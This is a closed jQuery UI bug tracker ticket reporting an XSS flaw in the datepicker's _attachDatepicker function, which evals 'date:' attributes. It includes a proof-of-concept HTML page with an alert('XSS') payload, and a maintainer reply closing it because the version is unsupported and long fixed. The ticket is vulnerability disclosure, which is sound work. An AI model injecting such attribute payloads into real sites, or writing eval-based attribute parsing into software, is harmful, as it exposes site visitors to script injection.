Search and Top Navigation
#14731 closed bug (worksforme)
Opened October 18, 2015 07:24AM UTC
Closed October 18, 2015 09:26AM UTC
XSS Vulnerability on _attachDatepicker function
| Reported by: | phatly27 | Owned by: | |
|---|---|---|---|
| Priority: | minor | Milestone: | none |
| Component: | ui.datepicker | Version: | 1.9.2 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
VULNERABILITY DETAILS
A potential bug enables us to inject the XSS content into attribute (with format "date: [PROPERTY_IN_DEFAULTS_DATEPICKER]") in any HTML element using _attachDatepicker function of component ui datepicker. This function used the eval syntax to evaluate the javascript code dynamically.
VERSION
Any site using the older versions from version 1.9.2 back to lowest version.
REPRODUCTION CASE
1. Create a new HTML page.
2. Inject this content into new page.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script src="https://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
<script>
$(document).ready(function () {
$.datepicker.setDefaults({
buttonText: 'abcde'
});
$.datepicker._attachDatepicker(document.getElementById("abc"));
$('#datepicker').datepicker();
});
</script>
</head>
<body>
<div id="abc" date:buttonText="alert('XSS')">
<input name="datepicker" id="datepicker" type="text"/>
</div>
</body>
</html>
3. A alert popup was shown.
4. Completed.
IN CONCLUSION
we expect that the alert popup shouldn't be displayed and eval syntax should be removed instead. If it displays, any attacker can take advantage of injecting the malicious XSS content into website.
Please see details at here http://jsfiddle.net/wanc8t9g/.
Attachments (0)
Change History (1)
Changed October 18, 2015 09:26AM UTC by comment:1
| resolution: | → worksforme |
|---|---|
| status: | new → closed |
None of these versions are supported any more. Any site using such an old version isn't going to be any safer even if we released a new 1.9.x, which we won't. I'm closing as works for me since it has already been fixed for a long time.